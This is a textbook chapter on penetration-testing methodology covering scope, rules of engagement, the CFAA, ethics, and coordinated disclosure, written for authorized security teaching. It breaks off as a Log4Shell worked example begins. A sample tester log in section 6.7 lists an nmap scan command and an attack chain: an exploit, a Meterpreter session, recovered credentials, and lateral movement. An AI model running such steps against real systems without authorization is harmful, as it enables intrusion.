Chapter 6: Penetration Testing Methodology
“Offense informs defense. To defend a system, you must first understand how it is attacked, under rules, with permission, and to a purpose.” – a guiding principle of professional penetration testing
Part II examined threats and the human element, and Chapter 5 showed how risk management decides what to defend. But how does an organization discover the vulnerabilities that feed the risk register in the first place? The answer is to attack itself, under controlled, authorized conditions. This chapter opens Part III, Offensive Security, with the methodology, the legal framework, and the ethics that turn hacking from a crime into a profession. Everything that follows in Chapters 7 through 10, reconnaissance, scanning, exploitation, and web attacks, happens inside the disciplined structure established here.
Learning Objectives
After completing this chapter, you will be able to:
Define penetration testing and distinguish it from vulnerability assessment and red-team engagements.
Distinguish the “hats” (white, gray, black) and team colors (red, blue, purple).
Compare testing knowledge levels: black-box, gray-box, and white-box (crystal-box).
Describe the phases of a penetration test and the major methodologies (PTES, NIST SP 800-115, OSSTMM).
Construct rules of engagement (RoE) and a proper scope, and explain why authorization is paramount.
Explain the legal framework governing security testing, including the Computer Fraud and Abuse Act (CFAA) and related statutes.
Apply professional ethics and coordinated vulnerability disclosure, including bug-bounty practice.
Write a useful penetration-test report with risk-ranked findings.
Key Terms
Penetration test (pen test): an authorized, simulated attack on systems to find and validate exploitable vulnerabilities.
Vulnerability assessment: identification and ranking of vulnerabilities, typically without exploitation.
Red team: an authorized adversarial team emulating real attackers; blue team: the defenders; purple team: red and blue working together to improve detection.
White / gray / black hat: an authorized helper; an unauthorized but non-malicious actor; an unauthorized malicious attacker.
Black-box / gray-box / white-box (crystal-box) testing: testing with no, partial, or full knowledge of the target.
Rules of engagement (RoE): the document defining scope, constraints, and conduct of a test.
Scope: the systems, networks, and activities authorized for testing.
PTES (Penetration Testing Execution Standard): a widely used methodology.
CFAA (Computer Fraud and Abuse Act): the principal U.S. anti-hacking statute.
CVD (Coordinated Vulnerability Disclosure): the practice of reporting a vulnerability privately to the vendor or a coordinator and timing public disclosure around the availability of a fix.
6.1 Why Methodology Matters
It would be tempting to think of penetration testing as simply “trying to break in,” but unstructured attacking is both ineffective and dangerous. A methodology, a defined, repeatable process, is what separates a professional engagement from random poking, and it exists for three reasons. First, completeness: a methodology ensures the tester systematically covers the attack surface rather than fixating on the first interesting finding, so that the test reflects what a real, patient adversary could achieve. Second, safety: testing against production systems can cause outages and data loss, so a disciplined process with agreed rules protects the client’s operations. Third, defensibility and repeatability: a documented methodology makes results reproducible, comparable over time, and credible to auditors, regulators, and courts, and it ties the test back to the risk-management process of Chapter 5, where its findings become entries in the risk register.
Penetration testing sits within a larger spectrum of security assessments. A high-level (Level I) assessment reviews policies and procedures with no hands-on testing, asking whether the right policies exist, are followed, and are sufficient. A network evaluation (Level II) adds hands-on activities such as information gathering and vulnerability scanning. A penetration test (Level III) takes an adversarial role, seeking to discover what an attacker can actually access and control, and is less concerned with policy than with demonstrating real impact. Understanding where a pen test fits in this spectrum keeps expectations realistic: it is a focused, time-bounded snapshot, not an exhaustive guarantee of security.
The chapter proceeds from definitions and roles, through the phased methodology and the all-important rules of engagement, to the legal and ethical framework that authorizes the work, and finally to disclosure and reporting. We begin by defining precisely what a penetration test is, and is not.
The phrase “offense informs defense” captures why this entire part of the book exists. Defenders who have never thought like attackers tend to protect the wrong things, over-investing in compliance checkboxes while leaving real attack paths open. By systematically adopting the adversary’s perspective, under authorization, penetration testing reveals how defenses actually fail in combination, not in theory. This is also why the same individual increasingly needs both skill sets: the best defenders understand offense, and the most useful testers understand how their findings translate into defensive priorities. The chapters that follow build the offensive skills, but always in service of this defensive purpose, which is the ethical and professional core that separates the security practitioner from the criminal.
6.2 What Penetration Testing Is, and Is Not
Having argued for methodology, we must define the activity itself, because “penetration test” is often used loosely for very different services. A penetration test is an authorized attack on one or more computers or networks to identify security weaknesses and then exploit them to validate the severity of the vulnerabilities, in order to assist risk management. Three elements of that definition are essential: the test is authorized (the dividing line from crime), it goes beyond finding weaknesses to actually exploiting them (the dividing line from a vulnerability scan), and its purpose is to inform risk decisions, not to cause harm.
This distinguishes a pen test from a vulnerability assessment, which identifies and ranks vulnerabilities, often with automated scanners, but typically does not exploit them. A vulnerability assessment answers “what weaknesses might exist?”; a penetration test answers “what can an attacker actually do with them?” The two are complementary: an assessment offers broad, inexpensive coverage, while a pen test offers narrow, deeper, more expensive validation. A red-team engagement goes further still, emulating a specific real-world adversary over an extended period, often testing detection and response (the blue team) as much as the technology, and frequently with a defined objective such as reaching a particular “crown jewel” asset.
It is equally important to state a pen test’s limits honestly, because overselling what a test proves is a common failure. A penetration test will not discover every vulnerability, will not use every possible exploit, and is only a snapshot in time; the real adversary faces none of the test’s constraints of duration, scope, permitted methods, or tester skill. A clean report means “the testers, within these limits, did not find a way in,” not “the system is secure.” Setting this expectation with stakeholders is part of professional practice, and it is why pen testing complements, rather than replaces, the continuous risk management of Chapter 5 and the monitoring of Chapter 12.
It is worth stating the business reasons organizations commission ethical hacking, because they shape an engagement’s goals. The most common drivers are a security breach (an incident has revealed a lapse and the organization needs to understand its exposure), compliance with a law, regulation, or industry standard that mandates testing, and due diligence (a structured evaluation, for example before a merger or a major deployment, so decision-makers can weigh costs, benefits, and risks with better information). Other drivers include validating a new system before launch, satisfying customer or partner security requirements, and measuring the effectiveness of the security team and its controls. Knowing the business driver tells the tester what the client actually needs from the engagement, whether broad assurance, a specific compliance attestation, or a realistic adversary simulation, and it keeps the work anchored to value rather than to finding vulnerabilities for their own sake.
The relationship among the three main assessment types is summarized below.
| Dimension | Vulnerability assessment | Penetration test | Red-team engagement |
|---|---|---|---|
| Goal | Find and rank weaknesses | Exploit to validate impact | Emulate a real adversary; test detection |
| Exploitation | Usually none | Yes, within scope | Yes, plus stealth and persistence |
| Breadth vs depth | Broad, shallow | Narrow, deep | Goal-focused, deep, covert |
| Defender awareness of the test | Defenders usually aware | Defenders usually aware | Often only a few defenders aware |
| Typical cost | Lower | Moderate | Highest |
| Primary output | Ranked vulnerability list | Risk-ranked exploited findings | Attack narrative + detection gaps |
6.3 Hats and Team Colors
The culture of security borrows a vivid vocabulary for the actors involved, and using it precisely matters because the distinctions are ultimately about authorization and intent, the same axes that defined the adversary model in Chapter 1. The “hat” metaphor, drawn from old Western films, classifies individuals. A white-hat hacker is legally authorized to discover and exploit vulnerabilities with the intent to improve security; this is the ethical hacker, the professional penetration tester. A black-hat hacker acts without any authorization and with malicious or self-serving intent, operating outside the law. A gray-hat hacker occupies the middle: skilled and often not malicious, but acting without complete authorization or by non-authorized methods, for example probing a system uninvited and then reporting what they find. The gray-hat’s good intentions do not make the activity legal, a point the legal section makes concrete.
A second vocabulary describes teams in an organized exercise. The red team plays the attacker, emulating adversaries to test defenses. The blue team plays the defender, operating the monitoring, detection, and response capabilities of Chapters 12 and 14. The purple team is not a separate group but a mode of working in which red and blue collaborate directly, the red team sharing techniques so the blue team can immediately improve detection, maximizing the learning from an engagement. In military and government contexts a red team may be formally certified, and the term penetration tester specifically denotes someone who conducts authorized offensive attacks against predesignated targets to discover and exploit vulnerabilities. Throughout this book, every offensive technique is presented for the white-hat, authorized purpose; the same action without authorization is the black-hat crime addressed by the legal framework of Section 6.8.
6.4 Knowledge Levels: Black, Gray, and White Box
Beyond who performs a test, engagements differ in how much the tester is told about the target in advance, and this choice shapes cost, realism, and coverage. The levels are named by “box” color. In black-box testing, the tester has no prior knowledge of the environment and must discover everything from the outside, which most realistically simulates an external attacker but spends significant time on reconnaissance and may miss internal issues. In gray-box testing, the tester has partial knowledge, perhaps user-level credentials or network diagrams, which balances realism against efficiency and is a common real-world choice, well suited to simulating an attacker who has gained a foothold or a malicious insider with limited access. In white-box (also called crystal-box) testing, the tester has full knowledge, source code, architecture, prior scan results, which decreases time spent on discovery and maximizes coverage, making it ideal for thorough, efficient assessment though less representative of a blind external attack.
The trade-offs are direct. Black-box testing is the most intrusive in spirit and narrowest in focus and tends to be the most expensive per finding because so much effort goes into discovery; white-box testing is minimally intrusive, widest in focus, and least costly per issue found, but it relies on the client sharing sensitive information and does not measure how hard a real outsider would have to work. Many engagements blend levels, beginning black-box to gauge external exposure and then shifting to gray- or white-box to ensure thorough internal coverage within the available time. Choosing the right knowledge level is part of scoping, the subject of the rules-of-engagement section, and it should follow directly from the client’s goal: simulate a specific threat, achieve maximum coverage, or something in between.
6.5 The Phases of a Penetration Test
With the actors and knowledge levels defined, we can lay out the process a test follows, which is remarkably consistent across methodologies because it mirrors how real attackers operate. The classic attack phases, which structure Chapters 7 through 9, are: reconnaissance and footprinting (gathering information, largely passively); scanning and enumeration (active reconnaissance to map hosts, ports, services, and accounts); gaining access (the initial exploit and entry); escalation of privilege (moving from limited to administrative control); maintaining access (ensuring the foothold persists); and post-exploitation validation and cleanup. This last phase is where an authorized tester differs sharply from a real attacker: rather than destroying logs to hide, the tester documents what was done, preserves the evidence the client needs, and removes only the tools, accounts, and changes introduced during the engagement so the environment is left as it was found. (Throughout this book the role is called a penetration tester; the terms ethical hacker and security assessor are used interchangeably in industry, but penetration tester is the standard term used here.) For the ethical tester a seventh phase, reporting, replaces the malicious attacker’s stealth as the true end goal, and an explicit permission phase precedes everything.
graph LR
P[Permission / Scoping] --> R[Reconnaissance]
R --> S[Scanning & Enumeration]
S --> G[Gaining Access]
G --> E[Privilege Escalation]
E --> M[Maintaining Access]
M --> C[Post-Exploitation<br/>Validation & Cleanup]
C --> RPT[Reporting]
RPT -.remediation & retest.-> P
Several formal methodologies codify this flow. The Penetration Testing Execution Standard (PTES) defines seven phases, pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting, and is among the most widely referenced. NIST Special Publication 800-115, the U.S. government’s technical guide to information security testing, frames testing as planning, discovery, attack, and reporting. The Open Source Security Testing Methodology Manual (OSSTMM) offers a rigorous, metrics-driven approach, and the OWASP Testing Guide specializes the process for web applications (Chapter 10). These methodologies agree far more than they differ; what matters is choosing one, following it consistently, and documenting the work so results are complete, safe, and repeatable. The distinctive feature of the ethical process is that it is bracketed by authorization at the start and reporting and remediation at the end, transforming the attacker’s kill chain into a constructive engagement.
It is worth walking the PTES phases in a little more detail, since they map onto the rest of Part III. Pre-engagement interactions establish scope and rules (Section 6.7). Intelligence gathering is reconnaissance (Chapter 7). Threat modeling prioritizes targets by likely attacker goals, reusing the methods of Chapter 5. Vulnerability analysis identifies weaknesses (Chapter 8). Exploitation gains access (Chapter 9), and post-exploitation determines the value of what was reached, escalating privileges, pivoting to other systems, and assessing business impact. Reporting communicates it all. NIST SP 800-115’s four phases map cleanly onto this: planning corresponds to pre-engagement, discovery to intelligence gathering and vulnerability analysis, attack to exploitation and post-exploitation, and reporting to reporting. Recognizing that these named methodologies describe the same underlying flow lets a tester move fluidly between client requirements, certification frameworks, and the chapters of this book.
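The correspondence just described can be written down as a small lookup table. The following is a minimal sketch, not part of either standard: the names `PTES_TO_NIST` and `ptes_phases_for` are hypothetical, and because the text does not assign threat modeling to a NIST SP 800-115 phase, the sketch leaves it unmapped rather than guessing.

```python
# PTES phase -> NIST SP 800-115 phase, as stated in the paragraph above.
# Threat modeling is not assigned there, so it is deliberately left as None.
PTES_TO_NIST = {
    "pre-engagement interactions": "planning",
    "intelligence gathering": "discovery",
    "threat modeling": None,  # assumption: left unmapped, not a claim about NIST
    "vulnerability analysis": "discovery",
    "exploitation": "attack",
    "post-exploitation": "attack",
    "reporting": "reporting",
}


def ptes_phases_for(nist_phase: str) -> list[str]:
    """Return the PTES phases that correspond to one NIST SP 800-115 phase."""
    return [ptes for ptes, nist in PTES_TO_NIST.items() if nist == nist_phase]


if __name__ == "__main__":
    for nist in ("planning", "discovery", "attack", "reporting"):
        print(f"{nist}: {', '.join(ptes_phases_for(nist))}")
```

A table like this is mainly useful when a client asks for a report organized by one methodology while the team's notes follow another.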
The methodologies can be compared at a glance, which helps in selecting one for a given client and context.
| Methodology | Origin / focus | Phases (summary) | Best for |
|---|---|---|---|
| PTES | Community standard, general | 7: pre-engagement, intel, threat modeling, vuln analysis, exploitation, post-exploitation, reporting | General network/enterprise tests |
| NIST SP 800-115 | US government, technical | 4: planning, discovery, attack, reporting | Government and compliance contexts |
| OSSTMM | ISECOM, metrics-driven | Operational security testing channels and metrics | Rigorous, measurable assessments |
| OWASP Testing Guide | OWASP, web apps | Web-specific test cases | Web application testing (Ch.10) |
| MITRE ATT&CK (knowledge base) | MITRE, adversary behavior | Tactics and techniques catalog | Red-team emulation, detection mapping |
6.6 Types of Penetration Tests
Before scoping an engagement, both tester and client must agree on what kind of test it is, because the target surface dictates the tools, skills, and rules required. Engagements are commonly categorized by the surface they probe. An external network test attacks internet-facing assets (web servers, mail servers, VPN gateways) as a remote outsider would, measuring perimeter exposure. An internal network test assumes the perspective of an attacker who already has a foothold or of a malicious insider, probing for lateral movement and privilege escalation once inside, a perspective whose importance the assume-breach philosophy of Chapter 1 underscores. A web application test focuses on the application layer using the OWASP methodology of Chapter 10, covering injection, authentication, and session flaws. A wireless test assesses Wi-Fi and other radio networks (Chapter 3), and a social-engineering test targets people through phishing and pretexting (Chapter 4), measuring human and procedural resilience.
Further categories address modern and physical surfaces. A physical penetration test attempts to defeat locks, badges, and facility controls to reach systems directly (Chapter 4), often combined with social engineering. Cloud penetration testing assesses cloud configurations and identity within the shared-responsibility model (Chapter 17), and must respect the cloud provider’s testing rules. Mobile and Internet-of-Things testing targets apps and devices (Chapters 16 and 17). Many real engagements combine several types, and the choice flows directly from the client’s goal and risk profile. The category also determines specialized rules of engagement: a physical test needs an authorization letter the tester carries to avoid arrest, a social-engineering test needs careful boundaries to protect employees, and a cloud test needs the provider’s permission. Naming the test type precisely is therefore the first scoping decision, and it shapes everything that follows.
A practical consequence of these categories is that each demands different expertise and safety precautions, so staffing and rules of engagement follow from the type chosen. A web test needs application-security skills and the OWASP methodology; a wireless test needs radio equipment and proximity; a physical test needs social finesse and a signed authorization letter the tester physically carries to prove permission if challenged; a cloud test needs familiarity with the provider’s architecture and its testing policy; and an operational-technology test (Chapter 20) demands extreme caution because a crashed industrial controller can have physical-safety consequences. Recognizing that “penetration test” is an umbrella over these distinct disciplines prevents the common mistake of scoping or staffing an engagement as if all targets were the same.
6.7 Pre-Engagement: Scope and the Rules of Engagement
The single most important phase happens before any packet is sent: defining what will be tested and how. Getting this wrong is how well-intentioned tests cause outages, breach the law, or deliver useless results, so professionals invest heavily here. Scope specifies the goal and the boundaries: which specific targets, networks, and applications are in or out, which attack vectors (external, internal, wireless, client-side, social engineering) are permitted, and the constraints of funding and timeframe. A constant danger is scope creep, the gradual expansion of testing beyond what was authorized, which the team guards against by staying focused on the agreed goal.
The scope and all conduct rules are captured in the rules of engagement (RoE), the most important document of the engagement and effectively the contract that authorizes and bounds it. A thorough RoE contains: a concept of operations explaining why the test is being done; the scope and focus; roles and responsibilities identifying stakeholders and points of contact; the assessment methodology; what information is provided to testers; the general rules of engagement (the do’s and don’ts); data handling rules for how client data is treated during and after; post-assessment restoration responsibilities; documentation guidelines and metrics; dispute resolution; the approval signatures of those authorized to grant permission; and appendices such as in-scope and out-of-scope IP lists and an event-termination memorandum.
The general rules deserve special attention because they prevent real harm. They identify exact locations, permitted dates and times, and systems explicitly out of scope; they list the testing team’s source IP addresses and designate a single client monitor who is the only point of contact and who has the authority to halt the test; and they answer pointed questions in advance: are denial-of-service attacks, man-in-the-middle attacks, reboots, physical entry, and social engineering permitted, and how are critical vulnerabilities to be reported immediately when found? The RoE also plans for defensive reactions: if the team is “shunned” (its traffic auto-blocked by an intrusion prevention system reconfiguring firewalls), an exemption list agreed in advance prevents the test from collapsing into a self-inflicted denial of service. Finally, the RoE specifies what testers must do afterward, removing artifacts and assisting with restoration. A disciplined RoE is what makes aggressive testing safe and lawful, and it embodies the chapter’s recurring theme that authorization, written and specific, is the foundation of the entire profession.
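Some teams encode the in-scope list, the exclusions, and the permitted hours so that tooling can refuse an out-of-bounds target before a packet is sent. The sketch below illustrates that idea under stated assumptions: `RulesOfEngagement` and `is_authorized` are hypothetical names, the networks and hours are invented, the testing window is assumed not to cross midnight, and permitted dates are not checked. It is a guard against accidental scope creep, not a substitute for the signed document.

```python
from dataclasses import dataclass
from datetime import datetime, time
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class RulesOfEngagement:
    """Hypothetical, minimal encoding of a few RoE constraints."""
    in_scope: tuple       # CIDR strings authorized for testing
    out_of_scope: tuple   # explicit exclusions; these always win
    window_start: time    # earliest permitted time of day
    window_end: time      # latest permitted time of day (same day)


def is_authorized(roe: RulesOfEngagement, target: str, when: datetime) -> bool:
    """True only if target is in scope, not excluded, and within the window."""
    addr = ip_address(target)
    if any(addr in ip_network(net) for net in roe.out_of_scope):
        return False
    if not any(addr in ip_network(net) for net in roe.in_scope):
        return False
    return roe.window_start <= when.time() <= roe.window_end


if __name__ == "__main__":
    # Illustrative values only.
    roe = RulesOfEngagement(
        in_scope=("10.10.10.0/24",),
        out_of_scope=("10.10.10.50/32",),
        window_start=time(9, 0),
        window_end=time(17, 0),
    )
    print(is_authorized(roe, "10.10.10.100", datetime(2026, 6, 2, 13, 42)))
    print(is_authorized(roe, "10.10.10.50", datetime(2026, 6, 2, 13, 42)))
```

Checking exclusions before inclusions is a deliberate choice: a host carved out of an otherwise in-scope network stays off limits even if the broader range is listed.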
To make the operational side concrete, professional testers keep a running log that becomes both the report’s backbone and a legal record. A simplified extract of such operational notes might read:
Critical path: Kali (192.168.1.10) -> FS1 (10.10.10.100) -> DC1 (10.10.10.101)
2026-06-02 13:42 nmap -T4 -Pn -sT -sV -p 443,445,389,3389 10.10.10.100
443 Apache 2.0.48 ; 3389 RDP ; 445 SMB
2026-06-02 13:59 Vulnerable Apache; launched authorized Metasploit exploit -> Meterpreter session
2026-06-02 14:12 Post-exploitation survey of FS1; located cached credentials
2026-06-02 14:40 Lateral movement to DC1 using recovered credentials (success) -- NOTIFIED MONITOR
Every action carries a timestamp, the exact command, the result, and any notification made, so that the engagement is fully reconstructable. This discipline supports the report, enables deconfliction with the blue team, and protects the tester if the work is ever questioned.
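The same discipline can be enforced with a small structured record instead of free-form notes. This is a minimal sketch under assumptions: `LogEntry` and `render_log` are hypothetical names, and the field layout simply mirrors the timestamp, action, result, and notification pattern of the extract above rather than any standard log format.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class LogEntry:
    """One engagement action: when, what was done, what happened, who was told."""
    timestamp: datetime
    action: str         # the exact command or a precise description
    result: str
    notified: str = ""  # e.g. "MONITOR" when the client monitor was informed

    def render(self) -> str:
        line = f"{self.timestamp:%Y-%m-%d %H:%M} {self.action} -> {self.result}"
        if self.notified:
            line += f" -- NOTIFIED {self.notified}"
        return line


def render_log(entries) -> str:
    """Render entries in chronological order, one per line."""
    ordered = sorted(entries, key=lambda e: e.timestamp)
    return "\n".join(e.render() for e in ordered)


if __name__ == "__main__":
    entries = [
        LogEntry(datetime(2026, 6, 2, 14, 40),
                 "Lateral movement to DC1 using recovered credentials",
                 "success", notified="MONITOR"),
        LogEntry(datetime(2026, 6, 2, 14, 12),
                 "Post-exploitation survey of FS1",
                 "located cached credentials"),
    ]
    print(render_log(entries))
```

Making the record immutable (`frozen=True`) reflects the log's role as evidence: entries are appended, never edited after the fact.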
6.8 The Legal Framework
Because the only difference between a penetration test and a felony is authorization, every professional must understand the laws that govern computer access, since a misstep can end a career or result in prosecution regardless of good intentions. In the United States the cornerstone is the Computer Fraud and Abuse Act (CFAA), 18 U.S.C. 1030, which criminalizes accessing a computer “without authorization” or in a manner that “exceeds authorized access.” Related provisions include 18 U.S.C. 1029 (fraud in connection with “access devices” such as passwords and card numbers, the “Access Device Statute”). The breadth of the phrase “exceeds authorized access” was long contested; the Supreme Court narrowed it in Van Buren v. United States (2021), holding that it does not cover merely violating a website’s terms of use or an employer’s policy when one is otherwise entitled to access the data, an important limit for security researchers.
Other statutes round out the framework. The Digital Millennium Copyright Act (DMCA) can implicate research that circumvents technological protection measures, though it includes a security-research exemption. The Electronic Communications Privacy Act (ECPA) and the Wiretap Act govern the interception of communications, directly relevant to sniffing and man-in-the-middle techniques. Many U.S. states have their own computer-crime laws, and other countries have analogs such as the United Kingdom’s Computer Misuse Act. Beyond statutes, contracts matter: the rules of engagement, master services agreement, and any non-disclosure agreement define the authorization that makes the work lawful, which is why testing must never begin until signed, written permission from a party with authority to grant it is in hand.
Knowledge Check
(1) What single factor most fundamentally separates a lawful penetration test from a CFAA violation?
(2) Why was the Supreme Court’s decision in Van Buren v. United States significant for security researchers?
Answers: (1) Authorization, documented, specific permission from a party entitled to grant it; the same technical action is lawful with it and criminal without it. (2) It narrowed “exceeds authorized access” so that merely violating terms of service or use policies, while otherwise authorized to access the data, is not itself a federal crime, reducing the risk that routine research is treated as a CFAA felony.
Two further legal dimensions matter in practice. First, international and cross-border testing multiplies the legal complexity: data-protection laws (such as the GDPR of Chapter 18), differing computer-crime statutes, and restrictions on cross-border data transfer can all apply when targets, data, or testers span jurisdictions, so engagements with any international element require legal review. Second, intellectual-property and contractual constraints shape what a tester may keep or disclose: non-disclosure agreements bind the tester to confidentiality, and the ownership of tools, scripts, and the report itself should be settled in the contract. The overarching rule remains simple to state and essential to honor: obtain explicit, written authorization from someone with the authority to grant it, keep that authorization within the bounds of the rules of engagement, and when anything is legally ambiguous, stop and consult counsel before proceeding.
6.9 Ethics and Professional Conduct
Authorization makes testing legal; ethics makes it trustworthy. Because penetration testers are granted deep access to their clients’ most sensitive systems, the profession depends on a strong ethical foundation, and most certifying bodies require adherence to a formal code. The EC-Council, (ISC)², and SANS/GIAC codes share common commitments: protect society and the client, act honestly and legally, perform only authorized work, maintain confidentiality of everything learned during an engagement, avoid conflicts of interest, and practice within one’s competence. The (ISC)² Code of Ethics, for instance, obliges members to protect society and the common good and to act honorably, honestly, and legally.
In practice, several ethical duties recur. Testers must stay within scope even when an enticing out-of-bounds target appears. They must do no unnecessary harm, avoiding actions that could damage data or disrupt operations beyond what the RoE permits, and they must stop and immediately notify the client if they discover a critical vulnerability or evidence that the system is already compromised, prioritizing the organization’s welfare over completing the test. They must protect the data they access and the report they produce, both of which are extraordinarily sensitive. And they must report honestly, neither exaggerating findings to impress nor concealing failures. These duties are not bureaucratic niceties; they are what allow organizations to grant the trust that makes the profession possible, and a single betrayal can end a career and expose the tester to liability. Ethics, in short, is the professional’s reputation made operational, and it underpins the disclosure practices considered next.
Going Deeper (graduate/research): adversary emulation and ATT&CK
The most advanced engagements move beyond generic testing to adversary emulation: reproducing the specific tactics, techniques, and procedures (TTPs) of a named threat group relevant to the client’s sector, drawn from the MITRE ATT&CK knowledge base and threat intelligence. Rather than asking “what vulnerabilities exist?”, adversary emulation asks “if threat group X targeted us, would we detect and stop them?”, directly exercising the blue team’s detection and response (Chapters 12 and 14). Frameworks such as MITRE’s ATT&CK Evaluations and tools like Atomic Red Team and Caldera support repeatable emulation, and the purple-team model turns each emulated technique into a concrete detection improvement. This represents the maturation of penetration testing from finding flaws toward measuring and improving an organization’s resilience against realistic, intelligence-driven threats, and it is an active area of both industry practice and academic research in security operations.
Ethical maturity also means knowing when not to act. A tester who finds that a client is already breached, or who stumbles upon evidence of serious wrongdoing, faces duties that may extend beyond the engagement, and these situations should be anticipated in the rules of engagement and escalated rather than handled unilaterally. Likewise, testers must resist scope temptation, the lure of an interesting target just outside the authorized boundary, and capability temptation, the urge to demonstrate a flashy but destructive technique that the client did not sanction. The discipline to stay within bounds, even when technically capable of more, is precisely what earns the trust that the profession runs on. Ethics, in this sense, is not a constraint on skill but the framework that makes skill employable.
6.10 Vulnerability Disclosure
A particular ethical question arises whenever a researcher discovers a vulnerability, especially outside a contracted engagement: what should they do with it? The answer has evolved into a set of recognized disclosure models, and understanding them is essential for anyone who finds a flaw in software they use. In full disclosure, the researcher publishes all details immediately; this pressures vendors to act and informs defenders, but it also arms attackers before a fix exists. In non-disclosure, details are withheld indefinitely, which protects no one if the vendor does nothing. The accepted middle path is responsible (or coordinated) disclosure: the researcher reports the vulnerability privately to the vendor and allows a reasonable period (commonly 90 days) for a fix before any public discussion, balancing the public’s right to know against the risk of premature exposure. The modern, formalized version is Coordinated Vulnerability Disclosure (CVD), often facilitated by a coordinator such as a national Computer Emergency Response Team (CERT) and tracked through the Common Vulnerabilities and Exposures (CVE) system that assigns each flaw a unique identifier.
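The timing logic of coordinated disclosure is simple date arithmetic. The sketch below assumes the 90-day period mentioned above and one common policy shape, publishing once a fix ships or the period lapses, whichever comes first. Real programs differ on extensions and grace periods, and the function names are hypothetical.

```python
from datetime import date, timedelta


def disclosure_deadline(reported_on: date, embargo_days: int = 90) -> date:
    """Date on which the private-reporting period ends."""
    return reported_on + timedelta(days=embargo_days)


def may_publish(reported_on: date, today: date,
                fix_released: bool = False, embargo_days: int = 90) -> bool:
    """Assumed policy: publish once a fix ships or the period has elapsed."""
    return fix_released or today >= disclosure_deadline(reported_on, embargo_days)


if __name__ == "__main__":
    reported = date(2026, 1, 1)  # illustrative report date
    print(disclosure_deadline(reported))
    print(may_publish(reported, date(2026, 2, 15)))
    print(may_publish(reported, date(2026, 2, 15), fix_released=True))
```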
Organizations increasingly invite this research. A vulnerability disclosure program (VDP) publishes a safe-harbor policy and a channel for reporting flaws, while a bug-bounty program additionally pays researchers for valid findings, with platforms such as HackerOne and Bugcrowd connecting researchers to companies. These programs convert would-be adversaries into allies and have become a standard part of mature security. The legal climate has shifted to support good-faith research as well.
Three companion systems give disclosure a common language and deserve definition. The Common Vulnerabilities and Exposures (CVE) system assigns each publicly known vulnerability a unique identifier (for example CVE-2021-44228 for the Log4Shell flaw). The Common Weakness Enumeration (CWE) classifies the type of underlying weakness (for example CWE-89 for SQL injection), which helps developers fix root causes. The Common Vulnerability Scoring System (CVSS) assigns a severity score from 0.0 to 10.0 based on exploitability and impact metrics, producing the Low/Medium/High/Critical bands used to prioritize remediation, exactly the ranking the report applies. Together, CVE names the instance, CWE names the class, and CVSS measures the severity, and fluency in all three is expected of working professionals. Bug-bounty economics build on these: payouts scale with severity (a critical remote-code-execution finding may earn many thousands of dollars), and mature programs have turned vulnerability discovery into a global, legitimate marketplace that channels researcher talent toward defense rather than the criminal underground or the gray market for exploits.
A sober complement to coordinated disclosure is the market for vulnerabilities. Beyond legitimate bug-bounty programs lies a gray market in which exploit brokers purchase zero-day vulnerabilities, often for far more than bounties pay, and resell them to governments or other buyers, and a black market in which they are sold to criminals. This economy creates genuine ethical tension: a researcher who finds a serious zero-day faces competing incentives (coordinated disclosure for modest or no pay, a large brokered payment, or criminal sale), and the choice has real consequences for public safety. The profession’s answer is unambiguous: ethical practice means coordinated disclosure that gets flaws fixed, not sale to those who would weaponize them, and the strengthening legal protections for good-faith research are meant in part to make the ethical path also the rational one. Understanding this market helps explain why nations stockpile exploits, why patching speed matters so much, and why the disclosure debate remains genuinely contested rather than settled.
The coordinated-disclosure process typically follows a recognizable timeline that benefits all parties: the researcher reports the flaw privately with enough detail to reproduce it; the vendor acknowledges receipt, validates it, and obtains a CVE identifier for it (assigning one directly if the vendor is a CVE Numbering Authority); both agree on a remediation timeline (often around 90 days, with extensions for complex fixes); the vendor releases a patch; and only then does the researcher publish details, often coordinated with the vendor’s advisory so that defenders can act. Maturity on both sides matters: vendors that respond promptly and credit researchers build goodwill, while researchers who allow reasonable time and avoid grandstanding keep the public safer. When a vendor is unresponsive or hostile, coordinators such as a national CERT can mediate, and the threat of eventual disclosure provides the pressure that makes the system work. This structured process is the practical embodiment of the ethics discussed above, turning the discovery of a dangerous flaw into a net gain for security rather than a weapon.
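The timeline above reduces to simple date arithmetic. The following is a minimal sketch, assuming the common 90-day default; the helper names `disclosure_deadline` and `may_publish` are hypothetical, and real programs set their own windows and extension rules.

```python
from datetime import date, timedelta

DEFAULT_WINDOW_DAYS = 90  # common default named in the text; programs vary


def disclosure_deadline(reported: date, extension_days: int = 0,
                        window_days: int = DEFAULT_WINDOW_DAYS) -> date:
    """Return the earliest agreed publication date for a privately reported flaw."""
    if extension_days < 0:
        raise ValueError("extension_days must be non-negative")
    return reported + timedelta(days=window_days + extension_days)


def may_publish(today: date, reported: date, patch_released: bool,
                extension_days: int = 0) -> bool:
    """Publish once a patch has shipped or the agreed window has elapsed."""
    return patch_released or today >= disclosure_deadline(reported, extension_days)


if __name__ == "__main__":
    reported = date(2024, 1, 15)  # hypothetical report date
    print("Deadline:", disclosure_deadline(reported))
    print("With 14-day extension:", disclosure_deadline(reported, extension_days=14))
```

Keeping the window and any extension as explicit parameters mirrors the negotiation described above: both parties can see exactly which date they have agreed to.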
Worked Example: CVE and CVSS in Practice (the Log4Shell case)#
To make CVE and CVSS concrete, consider the most consequential vulnerability of recent years,
Log4Shell, tracked as CVE-2021-44228. The CVE identifier itself follows the format
CVE-YYYY-NNNN (a year followed by a sequence number of four or more digits): the 2021 is the year it was reserved, and the digits are a unique serial, so the name
alone tells you nothing about severity, only that it is a specific, cataloged vulnerability. Disclosed in
December 2021, it affected Apache Log4j 2 (a ubiquitous Java logging library) in versions 2.0-beta9 through
2.15.0, and because Log4j is embedded in countless applications, it was estimated to expose hundreds of
millions of devices.
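Because the identifier format is fixed, it is easy to validate mechanically. The sketch below is illustrative only; `parse_cve_id` is a hypothetical helper, and the pattern assumes the current CVE syntax of a four-digit year followed by a sequence number of four or more digits.

```python
import re

# "CVE-", a four-digit year, then a sequence number of four or more digits.
CVE_PATTERN = re.compile(r"CVE-(\d{4})-(\d{4,})")


def parse_cve_id(cve_id: str) -> tuple[int, int]:
    """Split a CVE ID into (year, sequence); raise ValueError if malformed."""
    match = CVE_PATTERN.fullmatch(cve_id.strip().upper())
    if match is None:
        raise ValueError(f"not a well-formed CVE ID: {cve_id!r}")
    return int(match.group(1)), int(match.group(2))


if __name__ == "__main__":
    print(parse_cve_id("CVE-2021-44228"))  # year and serial only; no severity
```

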